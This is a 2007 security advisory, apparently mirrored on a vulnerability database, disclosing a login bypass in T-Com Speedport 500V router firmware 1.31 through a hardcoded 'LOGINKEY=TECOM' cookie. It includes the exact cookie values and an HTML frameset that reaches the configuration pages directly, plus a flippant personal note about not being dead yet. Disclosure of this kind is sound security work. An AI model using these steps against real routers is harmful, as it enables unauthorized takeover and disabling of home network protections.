Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15775
HistoryJan 21, 2007 - 12:00 a.m.

Virginity Security Advisory 2007-001 : T-Com Speedport 500V Login bypass

2007-01-2100:00:00
vulners.com
16
JSON

Virginity Security Advisory 2007-001

         DATE : 2007-01-19 15:32 GMT
         TYPE : remote

VERSIONS AFFECTED : T-Com Speedport 500V Firmware 1.31
AUTHOR : Virginity
ADVISORY NUMBER : 005

Description:

The Speedport 500V is a broadband-router which is sold in germany along
with ADSL lines. (just so you know)

The system is stupid and verifies wether you have entered the correct
password by setting a cookie with the content LOGINKEY=TECOM
(this is hardcoded and can not be changed)
If an attacker simply creates this cookie he can bypass password
authentication by simply calling the configuration html sites directly.

The attacker then has nearly full system access (you cannot change the
system password without knowing the old one) and can change system
configuration e.g. disable the firewall. You can also perform a firmware
upgrade, which allows you to reset the password to the default one, which
now gives you full system access.

Vendor has not been notified. I don't think they care^^.

Example:

Create a cookie like this:

Name: LOGINKEY
Content: TECOM
Host: <ipaddress> <- replace this by your routers ipaddress ;)
Path: /
Expires: Never

create a html page like this and open it in your browser:

<html>
<frameset rows="44," border=0 frameborder=0 framespacing=0">
<frame src="http://<ipaddress>/b_banner.htm" name="banner">
<frameset cols="170," border=0 frameborder=0 framespacing=0>
<frame src="http://<ipaddress>/m_startseite.htm" name="menu">
<frame src="http://<ipaddress>/hcti_startseite.htm" name="hcti">
</frameset>
</frameset>
</html>

this will bypass the login screen and lead you directly to configuration
menu.

Workaround:

Download the Sourcecode from the vendor (GPL), replace TECOM with something
else, try bulding it, and then try installing it on the hardware.
i did not try this. its stupid and does not really solve the problem.

Personal note:

Still here… sadly not dead yet. maybe i should hack the NSA so they kill
me? lol guess i'd have to learn some real things… greetz to s.
and that other admin.

JSON